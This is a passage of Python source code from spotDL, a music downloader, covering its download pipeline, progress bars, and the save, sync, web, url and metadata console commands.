logger.debug( "Could not remove duplicate file: %s, error: %s", old_song_path, exc, ) # Move the old file to the new location if ( most_recent_duplicate and most_recent_duplicate.suffix == output_file.suffix ): most_recent_duplicate.replace( output_file.with_suffix(f".{self.settings['format']}") ) if ( most_recent_duplicate and most_recent_duplicate.suffix != output_file.suffix ): logger.info( "Could not move duplicate file: %s, different file extension", most_recent_duplicate, ) display_progress_tracker.notify_complete() return song, None # Update the metadata embed_metadata( output_file=output_file, song=song, skip_album_art=self.settings["skip_album_art"], ) logger.info( f"Updated metadata for {song.display_name}" f", moved to new location: {output_file}" if most_recent_duplicate else "" ) display_progress_tracker.notify_complete() return song, output_file # Create the output directory if it doesn't exist output_file.parent.mkdir(parents=True, exist_ok=True) if song.download_url is None: download_url = self.search(song) else: download_url = song.download_url # Initialize audio downloader audio_downloader: Union[AudioProvider, Piped] if self.settings["audio_providers"][0] == "piped": audio_downloader = Piped( output_format=self.settings["format"], cookie_file=self.settings["cookie_file"], search_query=self.settings["search_query"], filter_results=self.settings["filter_results"], yt_dlp_args=self.settings["yt_dlp_args"], ) else: audio_downloader = AudioProvider( output_format=self.settings["format"], cookie_file=self.settings["cookie_file"], search_query=self.settings["search_query"], filter_results=self.settings["filter_results"], yt_dlp_args=self.settings["yt_dlp_args"], ) logger.debug("Downloading %s using %s", song.display_name, download_url) # Add progress hook to the audio provider audio_downloader.audio_handler.add_progress_hook( display_progress_tracker.yt_dlp_progress_hook ) download_info = audio_downloader.get_download_metadata( download_url, download=True ) temp_file = Path( temp_folder / f"{download_info['id']}.{download_info['ext']}" ) if download_info is None: logger.debug( "No download info found for %s, url: %s", song.display_name, download_url, ) raise DownloaderError( f"yt-dlp failed to get metadata for: {song.name} - {song.artist}" ) display_progress_tracker.notify_download_complete() # Copy the downloaded file to the output file # if the temp file and output file have the same extension # and the bitrate is set to auto or disable # Don't copy if the audio provider is piped # unless the bitrate is set to disable if ( self.settings["bitrate"] in ["auto", "disable", None] and temp_file.suffix == output_file.suffix ) and not ( self.settings["audio_providers"][0] == "piped" and self.settings["bitrate"] != "disable" ): shutil.move(str(temp_file), output_file) success = True result = None else: if self.settings["bitrate"] in ["auto", None]: # Use the bitrate from the download info if it exists # otherwise use `copy` bitrate = ( f"{int(download_info['abr'])}k" if download_info.get("abr") else "copy" ) elif self.settings["bitrate"] == "disable": bitrate = None else: bitrate = str(self.settings["bitrate"]) # Convert the downloaded file to the output format success, result = convert( input_file=temp_file, output_file=output_file, ffmpeg=self.ffmpeg, output_format=self.settings["format"], bitrate=bitrate, ffmpeg_args=self.settings["ffmpeg_args"], progress_handler=display_progress_tracker.ffmpeg_progress_hook, ) if self.settings["create_skip_file"]: with open( str(output_file) + ".skip", mode="w", encoding="utf-8" ) as _: pass # Remove the temp file if temp_file.exists(): try: temp_file.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove temp file: %s, error: %s", temp_file, exc ) raise DownloaderError( f"Could not remove temp file: {temp_file}, possible duplicate song" ) from exc if not success and result: # If the conversion failed and there is an error message # create a file with the error message # and save it in the errors directory # raise an exception with file path file_name = ( get_errors_path() / f"ffmpeg_error_{datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.txt" ) error_message = "" for key, value in result.items(): error_message += f"### {key}:\n{str(value).strip()}\n\n" with open(file_name, "w", encoding="utf-8") as error_path: error_path.write(error_message) # Remove the file that failed to convert if output_file.exists(): output_file.unlink() raise FFmpegError( f"Failed to convert {song.display_name}, " f"you can find error here: {str(file_name.absolute())}" ) download_info["filepath"] = str(output_file) # Set the song's download url if song.download_url is None: song.download_url = download_url display_progress_tracker.notify_conversion_complete() # SponsorBlock post processor if self.settings["sponsor_block"]: # Initialize the sponsorblock post processor post_processor = SponsorBlockPP( audio_downloader.audio_handler, SPONSOR_BLOCK_CATEGORIES ) # Run the post processor to get the sponsor segments _, download_info = post_processor.run(download_info) chapters = download_info["sponsorblock_chapters"] # If there are sponsor segments, remove them if len(chapters) > 0: logger.info( "Removing %s sponsor segments for %s", len(chapters), song.display_name, ) # Initialize the modify chapters post processor modify_chapters = ModifyChaptersPP( downloader=audio_downloader.audio_handler, remove_sponsor_segments=SPONSOR_BLOCK_CATEGORIES, ) # Run the post processor to remove the sponsor segments # this returns a list of files to delete files_to_delete, download_info = modify_chapters.run(download_info) # Delete the files that were created by the post processor for file_to_delete in files_to_delete: Path(file_to_delete).unlink() try: embed_metadata( output_file, song, id3_separator=self.settings["id3_separator"], skip_album_art=self.settings["skip_album_art"], ) except Exception as exception: raise MetadataError( "Failed to embed metadata to the song" ) from exception if self.settings["generate_lrc"]: generate_lrc(song, output_file) display_progress_tracker.notify_complete() # Add the song to the known songs self.known_songs.get(song.url, []).append(output_file) logger.info('Downloaded "%s": %s', song.display_name, song.download_url) return song, output_file except (Exception, UnicodeEncodeError) as exception: if isinstance(exception, UnicodeEncodeError): exception_cause = exception exception = DownloaderError( "You may need to add PYTHONIOENCODING=utf-8 to your environment" ) exception.__cause__ = exception_cause display_progress_tracker.notify_error( traceback.format_exc(), exception, True ) self.errors.append( f"{song.url} - {exception.__class__.__name__}: {exception}" ) return song, None File: spotdl/download/__init__.py """ Download module that holds the downloader and progress handler modules. """ File: spotdl/download/progress_handler.py """ Module that holds the ProgressHandler class and Song Tracker class. """ import logging from typing import Any, Callable, Dict, List, Optional from rich import get_console from rich.console import JustifyMethod, OverflowMethod from rich.highlighter import Highlighter from rich.markup import escape from rich.progress import ( BarColumn, Progress, ProgressColumn, Task, TaskID, TimeRemainingColumn, ) from rich.style import StyleType from rich.text import Text from spotdl.types.song import Song from spotdl.utils.static import BAD_CHARS __all__ = [ "ProgressHandler", "SongTracker", "ProgressHandlerError", "SizedTextColumn", ] logger = logging.getLogger(__name__) class ProgressHandlerError(Exception): """ Base class for all exceptions raised by ProgressHandler subclasses. """ class SizedTextColumn(ProgressColumn): """ Custom sized text column based on the Rich library. """ def __init__( self, text_format: str, style: StyleType = "none", justify: JustifyMethod = "left", markup: bool = True, highlighter: Optional[Highlighter] = None, overflow: Optional[OverflowMethod] = None, width: int = 20, ) -> None: """ A column containing text. ### Arguments - text_format: The format string to use for the text. - style: The style to use for the text. - justify: The justification to use for the text. - markup: Whether or not the text should be rendered as markup. - highlighter: A Highlighter to use for highlighting the text. - overflow: The overflow method to use for truncating the text. - width: The maximum width of the text. """ self.text_format = text_format self.justify: JustifyMethod = justify self.style = style self.markup = markup self.highlighter = highlighter self.overflow: Optional[OverflowMethod] = overflow self.width = width super().__init__() def render(self, task: Task) -> Text: """ Render the Column. ### Arguments - task: The Task to render. ### Returns - A Text object. """ _text = self.text_format.format(task=task) if self.markup: text = Text.from_markup(_text, style=self.style, justify=self.justify) else: text = Text(_text, style=self.style, justify=self.justify) if self.highlighter: self.highlighter.highlight(text) text.truncate(max_width=self.width, overflow=self.overflow, pad=True) return text class ProgressHandler: """ Class for handling the progress of a download, including the progress bar. """ def __init__( self, simple_tui: bool = False, update_callback: Optional[Callable[[Any, str], None]] = None, web_ui: bool = False, ): """ Initialize the progress handler. ### Arguments - simple_tui: Whether or not to use the simple TUI. - update_callback: A callback to call when the progress bar is updated. """ self.songs: List[Song] = [] self.song_count: int = 0 self.overall_progress = 0 self.overall_total = 100 self.overall_completed_tasks = 0 self.update_callback = update_callback self.previous_overall = self.overall_completed_tasks self.simple_tui = simple_tui self.web_ui = web_ui self.quiet = logger.getEffectiveLevel() < 10 self.overall_task_id: Optional[TaskID] = None if not self.simple_tui: console = get_console() self.rich_progress_bar = Progress( SizedTextColumn( "[white]{task.description}", overflow="ellipsis", width=int(console.width / 3), ), SizedTextColumn( "{task.fields[message]}", width=18, style="nonimportant" ), BarColumn(bar_width=None, finished_style="green"), "[progress.percentage]{task.percentage:>3.0f}%", TimeRemainingColumn(), # Normally when you exit the progress context manager (or call stop()) # the last refreshed display remains in the terminal with the cursor on # the following line. You can also make the progress display disappear on # exit by setting transient=True on the Progress constructor transient=True, ) # Basically a wrapper for rich's: with ... as ... self.rich_progress_bar.__enter__() def add_song(self, song: Song) -> None: """ Adds a song to the list of songs. ### Arguments - song: The song to add. """ self.songs.append(song) self.set_song_count(len(self.songs)) def set_songs(self, songs: List[Song]) -> None: """ Sets the list of songs to be downloaded. ### Arguments - songs: The list of songs to download. """ self.songs = songs self.set_song_count(len(songs)) def set_song_count(self, count: int) -> None: """ Set the number of songs to download. ### Arguments - count: The number of songs to download. """ self.song_count = count self.overall_total = 100 * count if not self.simple_tui: if self.song_count > 4: self.overall_task_id = self.rich_progress_bar.add_task( description="Total", message=( f"{self.overall_completed_tasks}/{int(self.overall_total / 100)} " "complete" ), total=self.overall_total, visible=(not self.quiet), ) def update_overall(self) -> None: """ Update the overall progress bar. """ if not self.simple_tui: # If the overall progress bar exists if self.overall_task_id is not None: self.rich_progress_bar.update( self.overall_task_id, message=f"{self.overall_completed_tasks}/" f"{int(self.overall_total / 100)} " "complete", completed=self.overall_progress, ) else: if self.previous_overall != self.overall_completed_tasks: logger.info( "%s/%s complete", self.overall_completed_tasks, self.song_count ) self.previous_overall = self.overall_completed_tasks def get_new_tracker(self, song: Song) -> "SongTracker": """ Get a new progress tracker. ### Arguments - song: The song to track. ### Returns - A new progress tracker. """ return SongTracker(self, song) def close(self) -> None: """ Close the Tui Progress Handler. """ if not self.simple_tui: self.rich_progress_bar.stop() logging.shutdown() class SongTracker: """ Class to track the progress of a song. """ def __init__(self, parent, song: Song) -> None: """ Initialize the Tui Song Tracker. ### Arguments - parent: The parent Tui Progress Handler. """ self.parent: "ProgressHandler" = parent self.song = song # Clean up the song name # from weird unicode characters self.song_name = "".join( char for char in self.song.display_name if char not in [chr(i) for i in BAD_CHARS] ) self.progress: int = 0 self.old_progress: int = 0 self.status = "" if not self.parent.simple_tui: self.task_id = self.parent.rich_progress_bar.add_task( description=escape(self.song_name), message="Processing", total=100, completed=self.progress, start=False, visible=(not self.parent.quiet), ) def update(self, message=""): """ Called at every event. ### Arguments - message: The message to display. """ old_message = self.status self.status = message # The change in progress since last update delta = self.progress - self.old_progress if not self.parent.simple_tui: # Update the progress bar # `start_task` called everytime to ensure progress is remove from indeterminate state self.parent.rich_progress_bar.start_task(self.task_id) self.parent.rich_progress_bar.update( self.task_id, description=escape(self.song_name), message=message, completed=self.progress, ) # If task is complete if self.progress == 100 or message == "Error": self.parent.overall_completed_tasks += 1 self.parent.rich_progress_bar.remove_task(self.task_id) else: # If task is complete if self.progress == 100 or message == "Error": self.parent.overall_completed_tasks += 1 # When running web ui print progress # only one time when downloading/converting/embedding if self.parent.web_ui and old_message != self.status: logger.info("%s: %s", self.song_name, message) elif not self.parent.web_ui and delta: logger.info("%s: %s", self.song_name, message) # Update the overall progress bar if self.parent.song_count == self.parent.overall_completed_tasks: self.parent.overall_progress = self.parent.song_count * 100 else: self.parent.overall_progress += delta self.parent.update_overall() self.old_progress = self.progress if self.parent.update_callback: self.parent.update_callback(self, message) def notify_error( self, message: str, traceback: Exception, finish: bool = False ) -> None: """ Logs an error message. ### Arguments - message: The message to log. - traceback: The traceback of the error. - finish: Whether to finish the task. """ self.update("Error") if finish: self.progress = 100 if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(message) else: logger.error("%s: %s", traceback.__class__.__name__, traceback) def notify_download_complete(self, status="Converting") -> None: """ Notifies the progress handler that the song has been downloaded. ### Arguments - status: The status to display. """ self.progress = 50 self.update(status) def notify_conversion_complete(self, status="Embedding metadata") -> None: """ Notifies the progress handler that the song has been converted. ### Arguments - status: The status to display. """ self.progress = 95 self.update(status) def notify_complete(self, status="Done") -> None: """ Notifies the progress handler that the song has been downloaded and converted. ### Arguments - status: The status to display. """ self.progress = 100 self.update(status) def notify_download_skip(self, status="Skipped") -> None: """ Notifies the progress handler that the song has been skipped. ### Arguments - status: The status to display. """ self.progress = 100 self.update(status) def ffmpeg_progress_hook(self, progress: int) -> None: """ Updates the progress. ### Arguments - progress: The progress to update to. """ if self.parent.simple_tui and not self.parent.web_ui: self.progress = 50 else: self.progress = 50 + int(progress * 0.45) self.update("Converting") def yt_dlp_progress_hook(self, data: Dict[str, Any]) -> None: """ Updates the progress. ### Arguments - progress: The progress to update to. """ if data["status"] == "downloading": file_bytes = data.get("total_bytes") if file_bytes is None: file_bytes = data.get("total_bytes_estimate") downloaded_bytes = data.get("downloaded_bytes") if self.parent.simple_tui and not self.parent.web_ui: self.progress = 50 elif file_bytes and downloaded_bytes: self.progress = downloaded_bytes / file_bytes * 50 self.update("Downloading") File: spotdl/console/save.py """ Save module for the console. """ import asyncio import json import logging from typing import List from spotdl.download.downloader import Downloader, DownloaderError from spotdl.types.song import Song from spotdl.utils.m3u import gen_m3u_files from spotdl.utils.search import parse_query __all__ = ["save"] logger = logging.getLogger(__name__) def save( query: List[str], downloader: Downloader, ) -> None: """ Save metadata from spotify to the disk. ### Arguments - query: list of strings to search for. - downloader: Already initialized downloader instance. ### Notes - This function is multi-threaded. """ save_path = downloader.settings["save_file"] m3u_file = downloader.settings["m3u"] to_stdout = save_path == "-" if save_path is None and not to_stdout: raise DownloaderError("Save file is not specified") # Parse the query songs = parse_query( query=query, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) save_data = [song.json for song in songs] def process_song(song: Song): try: data = downloader.search(song) if data is None: logger.error("Could not find a match for %s", song.display_name) return None logger.info("Found url for %s: %s", song.display_name, data) return {**song.json, "download_url": data} except Exception as exception: logger.error("%s generated an exception: %s", song.display_name, exception) return None async def pool_worker(song: Song): async with downloader.semaphore: # The following function calls blocking code, which would block whole event loop. # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This # is not a problem, since GIL is released for the I/O operations, so it shouldn't # hurt performance. return await downloader.loop.run_in_executor(None, process_song, song) if downloader.settings["preload"]: tasks = [pool_worker(song) for song in songs] # call all task asynchronously, and wait until all are finished save_data = list(downloader.loop.run_until_complete(asyncio.gather(*tasks))) if to_stdout: # Print the songs to stdout print(json.dumps(save_data, indent=4, ensure_ascii=False)) elif save_path: # Save the songs to a file with open(save_path, "w", encoding="utf-8") as save_file: json.dump(save_data, save_file, indent=4, ensure_ascii=False) if m3u_file: gen_m3u_files( songs, m3u_file, downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], False, ) if not to_stdout: logger.info( "Saved %s song%s to %s", len(save_data), "s" if len(save_data) > 1 else "", save_path, ) File: spotdl/console/sync.py """ Sync module for the console. """ import json import logging from typing import List, Tuple from pathlib import Path from spotdl.download.downloader import Downloader from spotdl.types.song import Song from spotdl.utils.formatter import create_file_name from spotdl.utils.m3u import gen_m3u_files from spotdl.utils.search import parse_query __all__ = ["sync"] logger = logging.getLogger(__name__) def sync( query: List[str], downloader: Downloader, ) -> None: """ Sync function for the console. It will download the songs and remove the ones that are no longer present in the playlists/albums/etc ### Arguments - query: list of strings to search for. - downloader: Already initialized downloader instance. """ save_path = downloader.settings["save_file"] downloader.settings["save_file"] = None m3u_file = downloader.settings["m3u"] downloader.settings["m3u"] = None # Query and save file # Create initial sync file if query and save_path: if any(req for req in query if req.endswith(".spotdl")): # If the query contains a .spotdl file, and we are about to create # .spotdl file, raise an error. raise ValueError( "Cannot create a sync file with a .spotdl file in the query." ) # Parse the query songs_list = parse_query( query=query, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) # Create sync file with open(save_path, "w", encoding="utf-8") as save_file: json.dump( { "type": "sync", "query": query, "songs": [song.json for song in songs_list], }, save_file, indent=4, ensure_ascii=False, ) # Perform initial download downloader.download_multiple_songs(songs_list) # Create m3u file if m3u_file: gen_m3u_files( songs_list, m3u_file, downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], False, ) return None # If the query is a single file, download it if ( # pylint: disable=R1702 len(query) == 1 # pylint: disable=R1702 and query[0].endswith(".spotdl") # pylint: disable=R1702 and not save_path # pylint: disable=R1702 ): # Load the sync file with open(query[0], "r", encoding="utf-8") as sync_file: sync_data = json.load(sync_file) # Verify the sync file if ( not isinstance(sync_data, dict) or sync_data.get("type") != "sync" or sync_data.get("songs") is None ): raise ValueError("Sync file is not a valid sync file.") # Parse the query songs_playlist = parse_query( query=sync_data["query"], threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) # Get the names and URLs of previously downloaded songs from the sync file old_files = [] for entry in sync_data["songs"]: file_name = create_file_name( Song.from_dict(entry), downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], ) old_files.append((file_name, entry["url"])) new_urls = [song.url for song in songs_playlist] # Delete all song files whose URL is no longer part of the latest playlist if not downloader.settings["sync_without_deleting"]: # Rename songs that have "{list-length}", "{list-position}", "{list-name}", # in the output path so that we don't have to download them again, # and to avoid mangling the directory structure. to_rename: List[Tuple[Path, Path]] = [] to_delete = [] for path, url in old_files: if url not in new_urls: to_delete.append(path) else: new_song = songs_playlist[new_urls.index(url)] new_path = create_file_name( Song.from_dict(new_song.json), downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], ) if path != new_path: to_rename.append((path, new_path)) # TODO: Downloading duplicate songs in the same playlist # will trigger a re-download of the song. To fix this we have to copy the song # to the new location without removing the old one. for old_path, new_path in to_rename: if old_path.exists(): logger.info("Renaming %s to %s", f"'{old_path}'", f"'{new_path}'") if new_path.exists(): old_path.unlink() continue try: old_path.rename(new_path) except (PermissionError, OSError) as exc: logger.debug( "Could not rename temp file: %s, error: %s", old_path, exc ) else: logger.debug("%s does not exist.", old_path) if downloader.settings["sync_remove_lrc"]: lrc_file = old_path.with_suffix(".lrc") new_lrc_file = new_path.with_suffix(".lrc") if lrc_file.exists(): logger.debug( "Renaming lrc %s to %s", f"'{lrc_file}'", f"'{new_lrc_file}'", ) try: lrc_file.rename(new_lrc_file) except (PermissionError, OSError) as exc: logger.debug( "Could not rename lrc file: %s, error: %s", lrc_file, exc, ) else: logger.debug("%s does not exist.", lrc_file) for file in to_delete: if file.exists(): logger.info("Deleting %s", file) try: file.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove temp file: %s, error: %s", file, exc ) else: logger.debug("%s does not exist.", file) if downloader.settings["sync_remove_lrc"]: lrc_file = file.with_suffix(".lrc") if lrc_file.exists(): logger.debug("Deleting lrc %s", lrc_file) try: lrc_file.unlink() except (PermissionError, OSError) as exc: logger.debug( "Could not remove lrc file: %s, error: %s", lrc_file, exc, ) else: logger.debug("%s does not exist.", lrc_file) if len(to_delete) == 0: logger.info("Nothing to delete...") else: logger.info("%s old songs were deleted.", len(to_delete)) if m3u_file: gen_m3u_files( songs_playlist, m3u_file, downloader.settings["output"], downloader.settings["format"], downloader.settings["restrict"], False, ) # Write the new sync file with open(query[0], "w", encoding="utf-8") as save_file: json.dump( { "type": "sync", "query": sync_data["query"], "songs": [song.json for song in songs_playlist], }, save_file, indent=4, ensure_ascii=False, ) downloader.download_multiple_songs(songs_playlist) return None raise ValueError( "Wrong combination of arguments. " "Either provide a query and a save path. Or a single sync file in the query" ) File: spotdl/console/web.py """ Web module for the console. """ import asyncio import logging import os import sys import webbrowser from pathlib import Path from fastapi import Depends, FastAPI from fastapi.middleware.cors import CORSMiddleware from uvicorn import Config, Server from spotdl._version import __version__ from spotdl.types.options import DownloaderOptions, WebOptions from spotdl.utils.config import get_web_ui_path from spotdl.utils.github import download_github_dir from spotdl.utils.logging import NAME_TO_LEVEL from spotdl.utils.web import ( ALLOWED_ORIGINS, SPAStaticFiles, app_state, fix_mime_types, get_current_state, router, ) __all__ = ["web"] logger = logging.getLogger(__name__) def web(web_settings: WebOptions, downloader_settings: DownloaderOptions): """ Run the web server. ### Arguments - web_settings: Web server settings. - downloader_settings: Downloader settings. """ # Apply the fix for mime types fix_mime_types() # Set up the app loggers uvicorn_logger = logging.getLogger("uvicorn") uvicorn_logger.propagate = False spotipy_logger = logging.getLogger("spotipy") spotipy_logger.setLevel(logging.NOTSET) # Initialize the web server settings app_state.web_settings = web_settings app_state.logger = uvicorn_logger # Create the event loop app_state.loop = ( asyncio.new_event_loop() if sys.platform != "win32" else asyncio.ProactorEventLoop() # type: ignore ) downloader_settings["simple_tui"] = True # Download web app from GitHub if not already downloaded or force flag set web_app_dir = get_web_ui_path() dist_dir = web_app_dir / "dist" if (not dist_dir.exists() or web_settings["force_update_gui"]) and web_settings[ "web_gui_location" ] is None: if web_settings["web_gui_repo"] is None: gui_repo = "https://github.com/spotdl/web-ui/tree/master/dist" else: gui_repo = web_settings["web_gui_repo"] logger.info("Updating web app from %s", gui_repo) download_github_dir( gui_repo, output_dir=str(web_app_dir), ) web_app_dir = Path(os.path.join(web_app_dir, "dist")).resolve() elif web_settings["web_gui_location"]: web_app_dir = Path(web_settings["web_gui_location"]).resolve() logger.info("Using custom web app location: %s", web_app_dir) else: logger.info( "Using cached web app. To update use the `--force-update-gui` flag." ) web_app_dir = Path(os.path.join(web_app_dir, "dist")).resolve() app_state.api = FastAPI( title="spotDL", description="Download music from Spotify", version=__version__, dependencies=[Depends(get_current_state)], ) app_state.api.include_router(router) # Add the CORS middleware app_state.api.add_middleware( CORSMiddleware, allow_origins=( ALLOWED_ORIGINS + web_settings["allowed_origins"] if web_settings["allowed_origins"] else ALLOWED_ORIGINS ), allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) # Add the static files app_state.api.mount( "/", SPAStaticFiles(directory=web_app_dir, html=True), name="static", ) protocol = "http" config = Config( app=app_state.api, host=web_settings["host"], port=web_settings["port"], workers=1, log_level=NAME_TO_LEVEL[downloader_settings["log_level"]], loop=app_state.loop, # type: ignore ) if web_settings["enable_tls"]: logger.info("Enabeling TLS") protocol = "https" config.ssl_certfile = web_settings["cert_file"] config.ssl_keyfile = web_settings["key_file"] config.ssl_ca_certs = web_settings["ca_file"] app_state.server = Server(config) app_state.downloader_settings = downloader_settings # Open the web browser webbrowser.open(f"{protocol}://{web_settings['host']}:{web_settings['port']}/") if not web_settings["web_use_output_dir"]: logger.info( "Files are stored in temporary directory " "and will be deleted after the program exits " "to save them to current directory permanently " "enable the `web_use_output_dir` option " ) else: logger.info( "Files are stored in current directory " "to save them to temporary directory " "disable the `web_use_output_dir` option " ) logger.info("Starting web server \n") # Start the web server app_state.loop.run_until_complete(app_state.server.serve()) File: spotdl/console/download.py """ Download module for the console. """ from typing import List from spotdl.download.downloader import Downloader from spotdl.utils.search import get_simple_songs __all__ = ["download"] def download( query: List[str], downloader: Downloader, ) -> None: """ Find songs with the provided audio provider and save them to the disk. ### Arguments - query: list of strings to search for. """ # Parse the query songs = get_simple_songs( query, use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], albums_to_ignore=downloader.settings["ignore_albums"], album_type=downloader.settings["album_type"], ) # Download the songs downloader.download_multiple_songs(songs) File: spotdl/console/entry_point.py """ Module that holds the entry point for the console. """ import cProfile import logging import pstats import signal import sys import time from spotdl.console.download import download from spotdl.console.meta import meta from spotdl.console.save import save from spotdl.console.sync import sync from spotdl.console.url import url from spotdl.console.web import web from spotdl.download.downloader import Downloader, DownloaderError from spotdl.utils.arguments import parse_arguments from spotdl.utils.config import create_settings from spotdl.utils.console import ACTIONS, generate_initial_config, is_executable from spotdl.utils.downloader import check_ytmusic_connection from spotdl.utils.ffmpeg import FFmpegError, download_ffmpeg, is_ffmpeg_installed from spotdl.utils.logging import init_logging from spotdl.utils.spotify import SpotifyClient, SpotifyError, save_spotify_cache __all__ = ["console_entry_point", "OPERATIONS"] OPERATIONS = { "download": download, "sync": sync, "save": save, "meta": meta, "url": url, } logger = logging.getLogger(__name__) def console_entry_point(): """ Entry point for the console. With profile flag, it runs the code with cProfile. """ if "--profile" in sys.argv: with cProfile.Profile() as profile: entry_point() stats = pstats.Stats(profile) stats.sort_stats(pstats.SortKey.TIME) stats.dump_stats("spotdl.profile") else: entry_point() def entry_point(): """ Console entry point for spotdl. This is where the magic happens. """ # Create config file if it doesn't exist generate_initial_config() # Check if sys.argv contains an action # If it does, we run the action and exit try: action_to_run = next( action for action_name, action in ACTIONS.items() if action_name in sys.argv ) except StopIteration: action_to_run = None if action_to_run: action_to_run() return None # Parse the arguments arguments = parse_arguments() # Create settings dicts spotify_settings, downloader_settings, web_settings = create_settings(arguments) init_logging(downloader_settings["log_level"], downloader_settings["log_format"]) # If the application is frozen, we check for ffmpeg # if it's not present download it create config file if is_executable(): if is_ffmpeg_installed() is False: download_ffmpeg() # Check if ffmpeg is installed if is_ffmpeg_installed(downloader_settings["ffmpeg"]) is False: raise FFmpegError( "FFmpeg is not installed. Please run `spotdl --download-ffmpeg` to install it, " "or `spotdl --ffmpeg /path/to/ffmpeg` to specify the path to ffmpeg." ) # Check if we are not blocked by ytm if "youtube-music" in downloader_settings["audio_providers"]: if not check_ytmusic_connection(): raise DownloaderError( "You are blocked by YouTube Music. " "Please use a VPN, change youtube-music to piped, or use other audio providers" ) # Initialize spotify client SpotifyClient.init(**spotify_settings) spotify_client = SpotifyClient() # If the application is frozen start web ui # or if the operation is `web` if is_executable() or arguments.operation == "web": # Default to the current directory when running a frozen application if is_executable(): web_settings["web_use_output_dir"] = True # Start web ui web(web_settings, downloader_settings) return None # Check if save file is present and if it's valid if isinstance(downloader_settings["save_file"], str) and ( not downloader_settings["save_file"].endswith(".spotdl") and not downloader_settings["save_file"] == "-" ): raise DownloaderError("Save file has to end with .spotdl") # Check if the user is logged in if ( arguments.query and "saved" in arguments.query and not spotify_settings["user_auth"] ): raise SpotifyError( "You must be logged in to use the saved query. " "Log in by adding the --user-auth flag" ) # Initialize the downloader # for download, load and preload operations downloader = Downloader(downloader_settings) def graceful_exit(_signal, _frame): if spotify_settings["use_cache_file"]: save_spotify_cache(spotify_client.cache) downloader.progress_handler.close() sys.exit(0) signal.signal(signal.SIGINT, graceful_exit) signal.signal(signal.SIGTERM, graceful_exit) start_time = time.perf_counter() try: # Pick the operation to perform # based on the name and run it! OPERATIONS[arguments.operation]( query=arguments.query, downloader=downloader, ) except Exception as exc: if downloader_settings["save_errors"]: with open( downloader_settings["save_errors"], "a", encoding="utf-8" ) as error_file: error_file.write("\n".join([exc + "\n" for exc in exc.args])) logger.debug("Saved errors to %s", downloader_settings["save_errors"]) end_time = time.perf_counter() logger.debug("Took %d seconds", end_time - start_time) downloader.progress_handler.close() logger.exception("An error occurred") sys.exit(1) end_time = time.perf_counter() logger.debug("Took %d seconds", end_time - start_time) if spotify_settings["use_cache_file"]: save_spotify_cache(spotify_client.cache) downloader.progress_handler.close() return None File: spotdl/console/__init__.py """ Console module, contains the console entry point and different subcommands. """ from spotdl.console.entry_point import console_entry_point __all__ = [ "console_entry_point", ] File: spotdl/console/url.py """ Url module for the console. """ import asyncio import logging from typing import List from spotdl.download.downloader import Downloader from spotdl.types.song import Song from spotdl.utils.search import parse_query __all__ = ["url"] logger = logging.getLogger(__name__) def url( query: List[str], downloader: Downloader, ) -> None: """ Print download url for the provided songs. ### Arguments - query: list of strings to search for. """ # Parse the query songs = parse_query( query=query, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) def process_song(song: Song): try: data = downloader.search(song) if data is None: logger.error("Could not find a match for %s", song.display_name) return None audio_provider = downloader.audio_providers[0] download_url = audio_provider.get_download_metadata(data)["url"] print(download_url) except Exception as exception: logger.error("%s generated an exception: %s", song.display_name, exception) return None async def pool_worker(song: Song): async with downloader.semaphore: # The following function calls blocking code, which would block whole event loop. # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This # is not a problem, since GIL is released for the I/O operations, so it shouldn't # hurt performance. return await downloader.loop.run_in_executor(None, process_song, song) tasks = [pool_worker(song) for song in songs] downloader.loop.run_until_complete(asyncio.gather(*tasks)) File: spotdl/console/meta.py """ Sync Lyrics module for the console """ import asyncio import logging from pathlib import Path from typing import List from spotdl.download.downloader import Downloader from spotdl.types.song import Song from spotdl.utils.ffmpeg import FFMPEG_FORMATS from spotdl.utils.lrc import generate_lrc from spotdl.utils.metadata import embed_metadata, get_file_metadata from spotdl.utils.search import QueryError, get_search_results, parse_query, reinit_song __all__ = ["meta"] logger = logging.getLogger(__name__) def meta(query: List[str], downloader: Downloader) -> None: """ This function applies metadata to the selected songs based on the file name. If song already has metadata, missing metadata is added ### Arguments - query: list of strings to search for. - downloader: Already initialized downloader instance. ### Notes - This function is multi-threaded. """ # Create a list of all songs from all paths in query paths: List[Path] = [] for path in query: test_path = Path(path) if not test_path.exists(): logger.error("Path does not exist: %s", path) continue if test_path.is_dir(): for out_format in FFMPEG_FORMATS: paths.extend(test_path.glob(f"*.{out_format}")) elif test_path.is_file(): if test_path.suffix.split(".")[-1] not in FFMPEG_FORMATS: logger.error("File is not a supported audio format: %s", path) continue paths.append(test_path) def process_file(file: Path): # metadata of the file, url is present in the file. song_meta = get_file_metadata(file, downloader.settings["id3_separator"]) # Check if song has metadata # and if it has all the required fields # if it has all of these fields, we can assume that the metadata is correct if song_meta and not downloader.settings["force_update_metadata"]: if ( song_meta.get("artist") and song_meta.get("artists") and song_meta.get("name") and song_meta.get("lyrics") and song_meta.get("album_art") ): logger.info("Song already has metadata: %s", file.name) if downloader.settings["generate_lrc"]: lrc_file = file.with_suffix(".lrc") if lrc_file.exists(): logger.info("Lrc file already exists for %s", file.name) return None song = Song.from_missing_data( name=song_meta["name"], artists=song_meta["artists"], artist=song_meta["artist"], ) generate_lrc(song, file) if lrc_file.exists(): logger.info("Saved lrc file for %s", song.display_name) else: logger.info("Could not find lrc file for %s", song.display_name) return None # 